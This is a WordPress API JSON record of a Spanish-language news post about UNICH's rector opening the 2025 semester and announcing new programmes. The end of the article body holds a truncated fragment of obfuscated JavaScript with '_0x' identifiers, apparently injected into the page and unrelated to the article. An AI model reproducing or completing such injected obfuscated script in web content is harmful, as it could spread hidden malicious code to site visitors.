{"id":19964,"date":"2025-01-22T03:59:36","date_gmt":"2025-01-22T03:59:36","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=19964"},"modified":"2025-01-22T03:59:37","modified_gmt":"2025-01-22T03:59:37","slug":"inician-actividades-en-la-unich-de-san-cristobal-con-importantes-anuncios-y-compromisos-para-el-semestre-2025","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=19964","title":{"rendered":"Inician actividades en la UNICH de San Crist\u00f3bal con importantes anuncios y compromisos para el semestre 2025"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"768\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/01\/IMG_2574-1024x768.jpeg\" alt=\"\" class=\"wp-image-19965\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/01\/IMG_2574-1024x768.jpeg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/01\/IMG_2574-300x225.jpeg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/01\/IMG_2574-768x576.jpeg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/01\/IMG_2574-1536x1152.jpeg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/01\/IMG_2574-2048x1536.jpeg 2048w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>Yolanda Rodr\u00edguez\/ Corresponsal<\/p>\n\n\n\n<p>21 de enero del 2025. San Crist\u00f3bal de las Casas.- Con entusiasmo y un fuerte compromiso por la educaci\u00f3n intercultural, el Dr. Javier L\u00f3pez S\u00e1nchez, Rector de la Universidad Intercultural de Chiapas (UNICH), dio inicio al semestre enero-julio 2025 en la sede central, evento que reuni\u00f3 tanto a estudiantes presenciales como a aquellos que participan de manera virtual desde las Unidades Acad\u00e9micas Multidisciplinarias, marcando el arranque de un nuevo ciclo acad\u00e9mico que, seg\u00fan el rector, estar\u00e1 guiado por tres ejes fundamentales.<\/p>\n\n\n\n<p>Durante su discurso inaugural, el Dr. L\u00f3pez S\u00e1nchez destac\u00f3 que este semestre se centrar\u00e1 en la formaci\u00f3n intercultural de los estudiantes, el di\u00e1logo intercultural y la justicia social, tres l\u00edneas de trabajo esenciales para el perfil acad\u00e9mico y social de la instituci\u00f3n.<\/p>\n\n\n\n<p>\u201cEsta rector\u00eda se va centrar en lo que supone es la formaci\u00f3n de nuestro estudiantes, vamos a tener reuniones permanentes con lo cuerpo acad\u00e9micos, vamos a discutir reflexivamente, creativamente por el bien de nuestra universidad. Vamos a centrarnos en una educaci\u00f3n altamente \u00e9tica, dignificar la vida universitaria, respetar nuestras y nuestros estudiantes por lo que saben, por lo que tienen, por lo que traen y c\u00f3mo se ir\u00e1n dependen de todos\u201d, dijo.<\/p>\n\n\n\n<p>Un anuncio importante que destac\u00f3 fue la creaci\u00f3n del Doctorado en Estudios Interculturales y Desarrollo Social, un programa acad\u00e9mico de alta especializaci\u00f3n dise\u00f1ado para formar profesionales con capacidad para liderar procesos de desarrollo social y promover la interculturalidad en diversos contextos.<\/p>\n\n\n\n<p>Este nuevo posgrado se suma a los programas acad\u00e9micos que la UNICH ofrece, ampliando su oferta educativa y fortaleciendo su compromiso con la formaci\u00f3n de l\u00edderes comprometidos con el bienestar social.<\/p>\n\n\n\n<p>Adem\u00e1s, L\u00f3pez S\u00e1nchez inform\u00f3 sobre la creaci\u00f3n de un Centro de Sabidur\u00eda de los Pueblos Ind\u00edgenas y el Hospital Universitario Intercultural, dos proyectos que fueron recientemente anunciados por el gobernador del estado, Eduardo Ram\u00edrez Aguilar, durante su visita a la universidad.<\/p>\n\n\n\n<p>Este inicio de semestre se perfila como un periodo lleno de desaf\u00edos y logros, con una clara misi\u00f3n de impulsar la educaci\u00f3n intercultural y el desarrollo social de la regi\u00f3n.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Yolanda Rodr\u00edguez\/ Corresponsal 21 de enero del 2025. San Crist\u00f3bal de las Casas.- Con entusiasmo y un fuerte compromiso por la educaci\u00f3n intercultural, el Dr. Javier L\u00f3pez S\u00e1nchez, Rector de la Universidad Intercultural de Chiapas (UNICH), dio inicio al semestre enero-julio 2025 en la sede central, evento que reuni\u00f3 tanto a estudiantes presenciales como a &hellip;<\/p>\n","protected":false},"author":2,"featured_media":19965,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-19964","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/19964","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=19964"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/19964\/revisions"}],"predecessor-version":[{"id":19966,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/19964\/revisions\/19966"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/19965"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=19964"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=19964"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=19964"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}